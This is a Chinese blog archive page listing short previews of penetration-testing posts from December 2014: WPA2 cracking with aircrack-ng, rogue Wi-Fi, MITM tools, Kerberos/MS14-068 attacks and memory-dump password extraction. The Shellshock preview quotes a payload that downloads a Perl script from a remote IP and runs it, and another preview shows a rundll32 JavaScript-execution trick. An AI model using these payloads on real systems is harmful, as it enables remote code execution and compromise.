自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

预览 取消 提交

自定义博客皮肤

-+
上一步保存

iteye_16188的博客

  • 博客(20)
  • 收藏
  • 关注
全部文章> 2014年12月
排序:
按最后发布时间
按访问量
RSS订阅
12月 11月 10月 09月 08月 07月 06月

原创 [译]使用Volatility从memory dump获得密码

原文地址:[url]https://cyberarms.wordpress.com/2011/11/04/memory-forensics-how-to-pull-passwords-from-a-memory-dump/[/url][b]1. 从memory dump 获得一些信息[/b][code="java"]volatility imageinfo -f memorydumpf...

2014-12-30 12:27:21 3319 3

原创 man crunch

[url]http://adaywithtape.blogspot.com.au/2011/05/creating-wordlists-with-crunch-v30.html[/url]

2014-12-28 23:35:44 88

原创 grep strings

grep -o -w '\w\{1,3\}' filename

2014-12-28 23:17:43 144

原创 Aircrack-Ng

[url]http://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/[/url]Step0: Preparationifconfig wlan0 downiwconfig wlan0 mode monitorifconfig wla...

2014-12-28 18:14:26 131

原创 password

wordlist: [url]http://hashcrack.blogspot.com/p/wordlist-downloads_29.html[/url]hash crack online: [url]http://hashcrack.blogspot.com/p/hash-crackers.html[/url]

2014-12-28 17:32:48 132

原创 kaili 1.09安装问题解决

本人采用的安装方法是1. 在VMware中安装1.09 Kali2. 将硬盘插入移动硬盘盒,usb插入,连接虚拟机3. dd if=/dev/sda of=/dev/sdb bs=16k4. sync5. eject然后硬盘就做好了,将硬盘装入电脑中,启动电脑这是出现硬盘坏点错误,不能启动图形界面提示输入root密码进行硬盘检查这时输入root密码然后fsc...

2014-12-28 14:10:28 125

原创 [译]Rogue Wi-Fi--------Mana

参考文章:[url]https://cyberarms.wordpress.com/2014/10/16/mana-tutorial-the-intelligent-rogue-wi-fi-router/[/url]一旦成功连接,自动运行SSLstrip来把HTTPS降级为HTTP,从而可以绕过HSTS来进行Mitm,破解Wi-Fi密码,抓取cookie,以及使用Firelamb来模拟se...

2014-12-26 23:39:17 168

原创 MITM MITMf

MITMf: [url]https://github.com/byt3bl33d3r/MITMf[/url]安装方法:使用方法:[url]http://sign0f4.blogspot.com/[/url]

2014-12-25 01:55:12 161

原创 Windows工具集

参考:[url]https://community.rapid7.com/servlet/JiveServlet/downloadBody/2881-102-2-6389/Mitigating%20Service%20Account%20Credential%20Theft%20on%20Windows.pdf[/url][b]Kerberos[/b]KerbCrack([url]ht...

2014-12-25 00:54:12 165

原创 Shellshock示例

来自:[url]http://pastebin.com/Qbgn09Wa[/url]邮件:[quote]===To:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend References:() { :; };wget -O /tmp...

2014-12-19 01:21:08 68

原创 Kerberos攻击

参考:1. [url]http://securityweekly.com/2014/09/26/derbycon-attacking-kerberos-talk-ill-be-checking-out-and-you-should-too/[/url]2. [url]https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%...

2014-12-18 01:39:08 373

原创 [译]剪切粘贴二进制文件

原文地址:[url]http://pen-testing.sans.org/blog/pen-testing/2014/12/10/awkward-binary-file-transfers-with-cut-and-paste[/url][b]Step 1 压缩源文件[/b][quote][color=blue]root@kali:~# gzip /bin/nc.traditio...

2014-12-17 01:20:45 361

原创 命令行执行JavaScript

[code="java"]rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert(‘foo’);[/code][img]http://dl2.iteye.com/upload/attachment/0104/3726/1b28aaec-ff50-3084-a61b-1b20ef72328e.png[/img]...

2014-12-15 00:10:16 322

原创 [译]使用Kerberos Exploitation Kit攻击MS14-068漏洞

原文地址:http://adsecurity.org/?p=676Kerberos漏洞允许攻击者提权域用户成为管理员账户。攻击者可以使用这些权限来访问域中任何机器,包含DC。攻击者必须有一个域口令来进行这种攻击本文使用MS14-068成功攻击Server 2012 和 2012/R2但是未能成功攻击2008 R2 DC[color=blue][b]开始攻击[/b][/col...

2014-12-14 23:49:56 383

原创 kali更新exploit-db

[code="java"]cd /usr/share/exploitdbwget http://www.exploit-db.com/archive.tar.bz2tar -xvjf archive.tar.bz2rm archive.tar.bz2[/code]

2014-12-12 01:08:06 1234

原创 使用Tesseract 识别验证码

参考:[url]http://code.google.com/p/tesseract-ocr/[/url][url]https://stackoverflow.com/questions/2363490/limit-characters-tesseract-is-looking-for[/url][url]http://resources.infosecinstitute.com/ca...

2014-12-10 00:48:23 83

原创 工具--excesspy 客户端邮件xss检查工具

项目地址:[url]https://github.com/allodoxaphobia/excesspy[/url]基本原理:从[url]http://ha.ckers.org/xssAttacks.xml[/url]下载各种xss payload,然后填充在mail的body,subject,from,to,header中,发送HTML格式邮件,然后客户端检查邮件。需要有一个账号,发...

2014-12-09 01:14:24 141

原创 文档-保护php文件上传

原文地址:[url]http://www.gremwell.com/sites/default/files/php-file-upload.pdf[/url]

2014-12-09 00:36:55 59

原创 服务器端包含注入

原文地址:[url]https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection[/url][url]http://resources.infosecinstitute.com/server-side-includes-ssi-injection/[/url]服务器端包含注入SSI出现在动态填写HTML页面的场...

2014-12-05 01:21:10 229

原创 使用apt-fast加速Ubuntu软件安装

apt-get是Ubuntu常用的软件安装和更新命令但是它使用单个连接来下载文件。所以产生了apt-get的替换命令apt-fast。安装:[code="java"]1. sudo apt-get install axel2. 从http://www.mattparnell.com/linux/apt-fast/下载脚本3. sudo mv ~/Downloads/apt-fast...

2014-12-02 01:21:54 102

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除